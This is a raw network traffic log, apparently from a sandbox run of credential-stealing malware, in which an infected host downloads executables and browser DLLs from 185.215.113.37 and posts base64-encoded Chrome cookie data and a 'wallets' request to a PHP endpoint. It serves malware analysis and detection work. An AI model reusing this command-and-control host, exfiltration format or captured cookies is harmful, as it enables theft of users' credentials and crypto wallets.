Oct 24, 2024 13:02:06.169039965 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:06 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 24, 2024 13:02:06.169070005 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 24, 2024 13:02:06.169095039 CEST	1236	IN	Data Raw: ec 0c 89 c5 85 db 74 05 83 fb 03 75 2e 89 7c 24 08 89 5c 24 04 89 34 24 e8 19 f7 0a 00 83 ec 0c 89 c5 89 7c 24 08 89 5c 24 04 89 34 24 e8 64 fd ff ff 83 ec 0c 85 c0 75 02 31 ed c7 05 48 67 eb 61 ff ff ff ff 83 c4 1c 89 e8 5b 5e 5f 5d c3 8d b4 26 Data Ascii: tu.\|$\$4$\|$\$4$du1Hga[^_]&+C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q
Oct 24, 2024 13:02:09.422640085 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjkwODAyCU5JRAk1MTE9VUJlTkNrWjNMOHlYY3g4cWg0SkZVWGt3a05DOUlyZGlSZGJqU1RqcVNpRmg4V3JSY2JLcl9yT0piZ0hZNlRBNFJULTZwczBiaGVtZndDUEJzTE1nUFQ3LWdUY1dxSHZadlpiYWZPcGtxUnkwZEx5WUc5QWpQMnZiVUJvbWFybmM5cGNaVmxoSGtVZVVhV011ckQwR0dYeVcwNV9CXzFJeVVOWUVFTG15cVJnCi5nb29nbGUuY29tCVRSVUUJLwlGQUxTRQkxNjk5MDcxNjQwCTFQX0pBUgkyMDIzLTEwLTA1LTA2Cg==------AFHDAKJKFCFBGCBGDHCB--
Oct 24, 2024 13:02:10.208151102 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:10.320864916 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAAFBAKECAEGCBFIEGDG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 41 46 42 41 4b 45 43 41 45 47 43 42 46 49 45 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAAFBAKECAEGCBFIEGDGContent-Disposition: form-data; name="file"------DAAFBAKECAEGCBFIEGDG--
Oct 24, 2024 13:02:11.107498884 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:10 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:12.070976019 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BFIIEHJDBKJKECBFHDGH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 46 49 49 45 48 4a 44 42 4b 4a 4b 45 43 42 46 48 44 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BFIIEHJDBKJKECBFHDGHContent-Disposition: form-data; name="file"------BFIIEHJDBKJKECBFHDGH--
Oct 24, 2024 13:02:12.856149912 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:13.577670097 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 13:02:13.870491028 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:13 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 24, 2024 13:02:15.671112061 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 13:02:15.958122969 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:15 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 24, 2024 13:02:16.974232912 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 13:02:17.270602942 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 24, 2024 13:02:18.002161026 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 13:02:18.286243916 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:18 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 24, 2024 13:02:20.057416916 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 13:02:20.343589067 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 24, 2024 13:02:20.530864000 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 13:02:20.815068007 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 24, 2024 13:02:21.421024084 CEST	201	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB Host: 185.215.113.37 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 13:02:22.205852032 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=84 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 13:02:22.248354912 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKKJEHCGCGDAAAKFHJKJ Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 34 30 38 64 39 62 33 62 37 39 61 37 62 61 63 32 32 30 63 30 36 61 63 38 64 64 30 30 63 31 30 35 65 37 65 65 37 65 38 32 62 64 63 63 63 37 62 61 39 34 64 62 31 65 32 66 33 34 38 39 38 38 30 31 62 30 61 34 32 32 61 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4a 45 48 43 47 43 47 44 41 41 41 4b 46 48 4a 4b 4a 2d 2d 0d 0a Data Ascii: ------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="token"e408d9b3b79a7bac220c06ac8dd00c105e7ee7e82bdccc7ba94db1e2f34898801b0a422a------KKKJEHCGCGDAAAKFHJKJContent-Disposition: form-data; name="message"wallets------KKKJEHCGCGDAAAKFHJKJ--
Oct 24, 2024 13:02:22.534691095 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 11:02:22 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: 